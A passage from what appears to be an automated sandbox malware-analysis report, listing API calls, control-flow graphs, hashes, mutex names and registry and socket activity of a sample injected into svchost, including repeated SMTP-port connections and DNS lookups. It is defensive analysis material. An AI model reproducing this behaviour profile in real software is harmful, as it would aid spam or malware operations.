                                                                                                                                                                                                                                                          • CharUpperBuffA.USER32(?,00000001,?,-00000004,-00000008,?,?,13145A2C,-00000004,?,?,?,?,00000000,76132640), ref: 13150AFC
                                                                                                                                                                                                                                                          • CharUpperBuffA.USER32(00000001,00000001,?,-00000004,-00000008,?,?,13145A2C,-00000004,?,?,?,?,00000000,76132640), ref: 13150B06
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: BuffCharUpper
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3964851224-0
                                                                                                                                                                                                                                                          • Opcode ID: 958c5ad26a8dfa64cf959f5ad1f9786dc7f05fd98d7ff308719baaa4a5385bca
                                                                                                                                                                                                                                                          • Instruction ID: 33661ecf4e8e57439f419d647e127ea0354b88d928e222e2be8bc089649f8951
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 958c5ad26a8dfa64cf959f5ad1f9786dc7f05fd98d7ff308719baaa4a5385bca
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 075139B5A40249EFD711DFACC980DAABBF9FF59308B644469F894E7201D731AA50CB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(03601028,13161EF0,00000000,03601020,03601020,?,1314CD65,?,13161EF0,131616E8), ref: 131518EE
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03601028,?,1314CD65,?), ref: 131518FB
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03601028,131616E8,?,1314CD65,?), ref: 1315190E
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,131616E8,?,1314CD65,?), ref: 13151927
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                                                          • Opcode ID: caab4dd3995b537a3e7fe88bb2e5526481f7b060322a23dbf6b07f2b764f47e7
                                                                                                                                                                                                                                                          • Instruction ID: 079bf1789869fdfda7f0d76e75eebd716d75c14f98fc5ce676a7518e497409ae
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: caab4dd3995b537a3e7fe88bb2e5526481f7b060322a23dbf6b07f2b764f47e7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7221AC75200205EFC709CF55C48495AB7BAFF8A324B25807DE5679B311C730F981CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,1314B99F,?,00000000,-00000004,0000003B,?,00000000,00000000,00000000,?,1468EC68,00000000), ref: 1315153A
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,1468EC68,00000000,?,?,?,?,?,?,?), ref: 13151548
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,131616E8,?,1468EC68,00000000,?,?,?,?,?,?,?), ref: 1315155D
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,000003E8,0000000C), ref: 13151597
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                                                          • Opcode ID: 52f5398c6f4f577c8c4e76fa03d76cbf28ba0f649fac66cf99410e3d807f1ade
                                                                                                                                                                                                                                                          • Instruction ID: a61f007b530fa145b951fee3529638bfdb7bb09819d3071aa21f2857e0bba9e4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52f5398c6f4f577c8c4e76fa03d76cbf28ba0f649fac66cf99410e3d807f1ade
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23016D756143519FCB32DF6ACDC4806B7E9AB4A2617050C39F557D3211C730E844CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 0 1314e022-1314e084 GetSystemTime call 1314ffe0 GetTickCount * 2 3 1314e086 0->3 4 1314e08d-1314e090 0->4 3->4 5 1314e092-1314e0ca call 13144eb1 * 2 call 13145b8d call 13144ec3 * 2 4->5 6 1314e0cd-1314e0d3 4->6 5->6 8 1314e19c-1314e1ad call 1314daf3 6->8 9 1314e0d9-1314e0e0 6->9 21 1314e2a7-1314e2cb shutdown closesocket call 13142f89 8->21 22 1314e1b3-1314e1c7 OpenMutexA 8->22 12 1314e0f5-1314e107 socket 9->12 13 1314e0e2-1314e0f0 shutdown closesocket 9->13 14 1314e10d-1314e142 call 13142f89 call 131506de 12->14 15 1314e32e-1314e35b ExitProcess GetTickCount 12->15 13->12 41 1314e144 14->41 42 1314e14b-1314e16a htons connect 14->42 28 1314e362-1314e390 call 13144d1b htons 15->28 32 1314e2d0-1314e2e1 call 131506de 21->32 23 1314e1d7-1314e1f8 call 13144c2f GetTickCount call 1314dfa8 22->23 24 1314e1c9-1314e1d1 CreateMutexA 22->24 23->4 53 1314e1fe-1314e21a call 13142f89 call 131506de 23->53 24->23 39 1314e393-1314e399 28->39 32->4 51 1314e2e7-1314e329 call 13144c2f call 13144eb1 * 2 call 1314df63 call 13144ec3 * 2 32->51 45 1314e3f9 39->45 46 1314e39b-1314e3c5 call 13142f89 DnsQuery_A 39->46 41->42 48 1314e16c-1314e172 call 1314d187 42->48 49 1314e179-1314e184 GetLastError Sleep 42->49 55 1314e3fb-1314e401 45->55 67 1314e3c7-1314e3eb call 13144d1b DnsRecordListFree 46->67 68 1314e3f0-1314e3f7 46->68 61 1314e177 48->61 56 1314e18a-1314e196 49->56 51->4 88 1314e21c-1314e228 closesocket 53->88 89 1314e22d-1314e259 call 13142f89 call 131506de GetTickCount 53->89 62 1314e472-1314e47f 55->62 63 1314e403-1314e409 55->63 56->4 56->8 61->56 65 1314e481-1314e488 62->65 66 1314e49a-1314e4ba call 13142f89 call 131506de 62->66 70 1314e467-1314e470 63->70 71 1314e40b-1314e44f socket setsockopt connect 63->71 74 1314e489-1314e48b 65->74 66->28 94 1314e4c0-1314e4c6 66->94 67->68 68->39 68->45 70->55 70->62 78 1314e461-1314e462 closesocket 71->78 79 1314e451-1314e45c recv 71->79 81 1314e494-1314e498 74->81 82 1314e48d 74->82 78->70 79->78 81->66 81->74 82->81 88->89 89->4 102 1314e25f-1314e29a Sleep call 13142f89 call 131506de GetTickCount 89->102 94->28 97 1314e4cc-1314e4da Sleep 94->97 97->94 101 1314e4dc 97->101 101->28 109 1314e29c-1314e2a2 102->109 109->4
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?,00020000,76122E60,00000000), ref: 1314E02F
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E04A
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E051
                                                                                                                                                                                                                                                          • shutdown.WS2_32(?,00000002), ref: 1314E0E5
                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 1314E0F0
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000000), ref: 1314E0FA
                                                                                                                                                                                                                                                          • htons.WS2_32(00000019), ref: 1314E14E
                                                                                                                                                                                                                                                          • connect.WS2_32(00000002,00000010,00000019), ref: 1314E163
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000002,00000010,00000019,-00000004,00000041,00000000,00000002,00000001,00000000), ref: 1314E179
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 1314E184
                                                                                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000), ref: 1314E1BF
                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000), ref: 1314E1D1
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E1E8
                                                                                                                                                                                                                                                          • closesocket.WS2_32(-00000004), ref: 1314E228
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E24F
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 1314E264
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E28C
                                                                                                                                                                                                                                                          • shutdown.WS2_32(00000002,00000000), ref: 1314E2B5
                                                                                                                                                                                                                                                          • closesocket.WS2_32 ref: 1314E2C0
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000002,00000001,00000000), ref: 1314E32E
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E347
                                                                                                                                                                                                                                                          • htons.WS2_32(00000019), ref: 1314E387
                                                                                                                                                                                                                                                          • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000), ref: 1314E3BE
                                                                                                                                                                                                                                                          • DnsRecordListFree.DNSAPI(?,?), ref: 1314E3EB
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 1314E411
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000008), ref: 1314E433
                                                                                                                                                                                                                                                          • connect.WS2_32(00000000,00000002,00000010), ref: 1314E448
                                                                                                                                                                                                                                                          • recv.WS2_32(00000000,1468EA2E,00000064,00000000), ref: 1314E45C
                                                                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 1314E462
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4D1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CountTick$closesocket$Sleep$Mutexconnecthtonsshutdownsocket$CreateErrorExitFreeLastListOpenProcessQuery_RecordSystemTimerecvsetsockopt
                                                                                                                                                                                                                                                          • String ID: 0u
                                                                                                                                                                                                                                                          • API String ID: 850683436-3203441087
                                                                                                                                                                                                                                                          • Opcode ID: 476bf50b3d17dc5e10a3cb6b97ce9bcd370b968a92d9403d835319dcdd4e9730
                                                                                                                                                                                                                                                          • Instruction ID: 43d5bb9465e87192af08d7f6881986c4e70353d981fa44b77742f62da2d52e8e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 476bf50b3d17dc5e10a3cb6b97ce9bcd370b968a92d9403d835319dcdd4e9730
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17C1BFB5904369BBDB12AFB8CCC5AAEB77DFB05708F240539E509B3150EB786940CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(00000002,00000001,00000000,00000000), ref: 13143EFA
                                                                                                                                                                                                                                                          • htons.WS2_32(00000035), ref: 13143F44
                                                                                                                                                                                                                                                          • htons.WS2_32(00000035), ref: 13143F58
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000035,00000035,?,?,?,?,?,?,?,?,?,?,?,0000007C), ref: 13143F85
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: htons$ReadSleep
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 317343359-0
                                                                                                                                                                                                                                                          • Opcode ID: aca6d139ad8c5132870db979fd9706aade7e1c0b2be7960fae7b654ebd86ae57
                                                                                                                                                                                                                                                          • Instruction ID: ed5b5b64522fe66a5ea052113b0c2f9187125999cf5ff2d51e395da3c559b608
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aca6d139ad8c5132870db979fd9706aade7e1c0b2be7960fae7b654ebd86ae57
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40A1C075D40289EFCB01CFA8CD84DDEBBB9AF15304F2940A9E944B7251DB31AE44CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 169 1314e335-1314e35b GetTickCount 170 1314e362-1314e390 call 13144d1b htons 169->170 173 1314e393-1314e399 170->173 174 1314e3f9 173->174 175 1314e39b-1314e3c5 call 13142f89 DnsQuery_A 173->175 177 1314e3fb-1314e401 174->177 183 1314e3c7-1314e3eb call 13144d1b DnsRecordListFree 175->183 184 1314e3f0-1314e3f7 175->184 179 1314e472-1314e47f 177->179 180 1314e403-1314e409 177->180 181 1314e481-1314e488 179->181 182 1314e49a-1314e4ba call 13142f89 call 131506de 179->182 185 1314e467-1314e470 180->185 186 1314e40b-1314e44f socket setsockopt connect 180->186 187 1314e489-1314e48b 181->187 182->170 198 1314e4c0-1314e4c6 182->198 183->184 184->173 184->174 185->177 185->179 190 1314e461-1314e462 closesocket 186->190 191 1314e451-1314e45c recv 186->191 192 1314e494-1314e498 187->192 193 1314e48d 187->193 190->185 191->190 192->182 192->187 193->192 198->170 199 1314e4cc-1314e4da Sleep 198->199 199->198 200 1314e4dc 199->200 200->170
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E347
                                                                                                                                                                                                                                                          • htons.WS2_32(00000019), ref: 1314E387
                                                                                                                                                                                                                                                          • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000), ref: 1314E3BE
                                                                                                                                                                                                                                                          • DnsRecordListFree.DNSAPI(?,?), ref: 1314E3EB
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 1314E411
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000008), ref: 1314E433
                                                                                                                                                                                                                                                          • connect.WS2_32(00000000,00000002,00000010), ref: 1314E448
                                                                                                                                                                                                                                                          • recv.WS2_32(00000000,1468EA2E,00000064,00000000), ref: 1314E45C
                                                                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 1314E462
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4D1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CountFreeListQuery_RecordSleepTickclosesocketconnecthtonsrecvsetsockoptsocket
                                                                                                                                                                                                                                                          • String ID: 0u
                                                                                                                                                                                                                                                          • API String ID: 3184855960-3203441087
                                                                                                                                                                                                                                                          • Opcode ID: 70f56cf523c1d56b694a67b5dd4fc1a235a7ea17d7e17cd53ed7dd491893a9b6
                                                                                                                                                                                                                                                          • Instruction ID: 3abf82c69722f3967bdfbc74bbd690c7064bfefbac1ba47bfefbd6294108a016
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70f56cf523c1d56b694a67b5dd4fc1a235a7ea17d7e17cd53ed7dd491893a9b6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B341F072944359BBEB129BA8CC81AEEB77CFF15B08F180439E649B7180E77469448B61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 13145427: CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314334E,00016B00,LoadLibraryExA,?), ref: 1314543F
                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 1314335A
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 13143365
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 131433C2
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 131433CA
                                                                                                                                                                                                                                                          • OpenMutexA.KERNEL32(00020000,00000000,rjsfitz60229), ref: 131433D8
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 131433ED
                                                                                                                                                                                                                                                            • Part of subcall function 1314AD4E: RegOpenKeyExA.KERNELBASE(80000002,-00000004,000000EA,00000000,000F003F,131433FC), ref: 1314AD7C
                                                                                                                                                                                                                                                            • Part of subcall function 1314AD4E: RegSetValueExA.ADVAPI32(131433FC,-00000004,0000002F,00000000,00000004,0000FFFE,00000004), ref: 1314ADA1
                                                                                                                                                                                                                                                            • Part of subcall function 1314AD4E: RegCloseKey.ADVAPI32(131433FC), ref: 1314ADAA
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseOpen$CountCreateExitFileHandleMutexProcessSleepStartupTickValue
                                                                                                                                                                                                                                                          • String ID: LoadLibraryExA$rjsfitz60229$rxzhsef91571$wnyqpjt13409
                                                                                                                                                                                                                                                          • API String ID: 1822930774-2952085752
                                                                                                                                                                                                                                                          • Opcode ID: 965f3d8219d039e1fc520c4488c4ba020a51fddd4f67c41b5b7b0c04f2972646
                                                                                                                                                                                                                                                          • Instruction ID: 8a80587115f15fefb65b334c3320f1afafce057311b930bd89483dacacd9f4c7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 965f3d8219d039e1fc520c4488c4ba020a51fddd4f67c41b5b7b0c04f2972646
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A71198B6600355AFE710BBBD8DC5B5E765CEB05658F390835EA08D2544FF38A8118A71
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • gethostname.WS2_32(?,00000040), ref: 13146239
                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 13146242
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll,?,?,LoadLibraryExA), ref: 1314626B
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1314627D
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,LoadLibraryExA), ref: 13146288
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProcgethostbynamegethostname
                                                                                                                                                                                                                                                          • String ID: LoadLibraryExA$SendARP$iphlpapi.dll
                                                                                                                                                                                                                                                          • API String ID: 4149995341-444255208
                                                                                                                                                                                                                                                          • Opcode ID: 63d9c93c3878eea5f39d741568cbe5cdfc3c01f2e029f048b2aa2319c6185dc9
                                                                                                                                                                                                                                                          • Instruction ID: 5354f2f1f209b7a01f4b35da72f9dcbe16b16dcda766e66485e1e535770a51d0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63d9c93c3878eea5f39d741568cbe5cdfc3c01f2e029f048b2aa2319c6185dc9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC117076E10319FBDB01ABB4CD8AFDE7BACAF08658F144574F901E6140E778E64486A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 249 13143212-13143240 GetCurrentThreadId CreateThread 250 13143242-13143244 249->250 251 13143249-1314325b CreateThread 249->251 252 131432d0-131432d4 250->252 251->250 253 1314325d-1314326b Sleep 251->253 254 13143273-1314327a 253->254 255 13143291-131432a4 CreateThread 254->255 256 1314327c-1314328f Sleep 254->256 255->250 257 131432a6-131432b8 CreateThread 255->257 256->254 256->255 257->250 258 131432ba-131432ce CreateThread 257->258 258->252
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 13143216
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,1314AC90,00000000,00000000,1315B698), ref: 1314323C
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,1314E335,00000000,00000000,1315B684), ref: 13143257
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4,?,?,1314340F), ref: 13143269
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 13143281
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,131460AA,00000000,00000000,1315B688), ref: 1314329F
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,131448A8,00000000,00000000,1315B68C), ref: 131432B4
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,1314CCE7,00000000,00000000,1315B694), ref: 131432C8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Thread$Create$Sleep$Current
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 773548574-0
                                                                                                                                                                                                                                                          • Opcode ID: d125012d3972e69df1683d7a917f2bca7c5ad83ee571bde9b23c96734ccfa98c
                                                                                                                                                                                                                                                          • Instruction ID: 8fd118986bc5cf1931c0d32a12ebccf3781935e800841fb4d7bc385c2169f3f6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d125012d3972e69df1683d7a917f2bca7c5ad83ee571bde9b23c96734ccfa98c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C11E1F074539A7FFA106B728CC4DB73AACFB92B8AB204935F421E2086D7649C005970
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 259 131504be-131504cd 260 131504d3-131504d7 259->260 261 131506d9-131506db 259->261 260->261 262 131504dd-131504f2 StrStrA 260->262 263 13150595-131505a2 StrStrA 262->263 264 131504f8-13150511 call 13145117 call 1315041e 262->264 266 131505a4-131505ae StrStrA 263->266 267 13150601-1315061a call 13144c8d call 1315041e 263->267 277 13150521-13150529 StrStrA 264->277 278 13150513-1315051c call 1315036b 264->278 266->267 270 131505b0-131505da call 13144ff9 call 13144f39 wnsprintfA 266->270 285 13150652-13150662 call 13150460 267->285 286 1315061c-13150620 267->286 283 131506d7-131506d8 270->283 287 131505e0-131505f0 call 131504be 270->287 277->283 284 1315052f-13150549 call 131504be 277->284 278->277 283->261 302 13150584-1315058a StrStrA 284->302 300 13150664-13150669 285->300 301 1315069a-131506a1 285->301 290 13150626-13150628 286->290 291 13150622-13150624 286->291 306 131505f3-131505fc call 13144c2f 287->306 295 1315063d-13150648 call 1315036b 290->295 296 1315062a-13150638 call 131502dc 290->296 291->290 291->295 307 1315064d 295->307 296->283 300->301 308 1315066b-13150672 300->308 304 131506a7-131506a9 301->304 305 131506a3-131506a5 301->305 309 1315058c-13150593 302->309 310 1315054b-13150558 StrStrA 302->310 313 131506c4-131506d3 304->313 314 131506ab-131506c2 call 13145117 304->314 305->304 305->313 306->283 307->283 316 13150674-13150676 308->316 317 13150678-1315067a 308->317 309->306 311 1315055d-13150563 310->311 312 1315055a 310->312 318 13150565-13150568 311->318 319 1315057a-1315057c 311->319 312->311 313->283 314->283 316->317 322 1315068a-13150698 call 13150227 316->322 317->322 323 1315067c-13150688 call 13150165 317->323 318->319 325 1315056a-13150577 call 131504be 318->325 319->309 326 1315057e-13150583 319->326 322->283 323->283 325->319 326->302
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,131414A8,?,00000000,00000000,?,?), ref: 131504EE
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,131414A8,00000000), ref: 13150525
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000001,131414A8), ref: 13150551
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(?,131414A8), ref: 13150584
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,131413B4), ref: 1315059E
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,131414A4), ref: 131505AA
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 131505CF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: wnsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 167729887-0
                                                                                                                                                                                                                                                          • Opcode ID: 69c86b01aac859a30bbc1d71e88b407455c20e99e071a5a0d658fab4ee3408b8
                                                                                                                                                                                                                                                          • Instruction ID: a6ff255ed67f6392e07df8d19f3ae9cc02a2b561499c0f923b17916563e3073b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69c86b01aac859a30bbc1d71e88b407455c20e99e071a5a0d658fab4ee3408b8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F61C035A01249BFDF014FA5CD40FAE3BAAEF87254F188029FC356B290DB31D941DAA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 131453DC: GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453FC
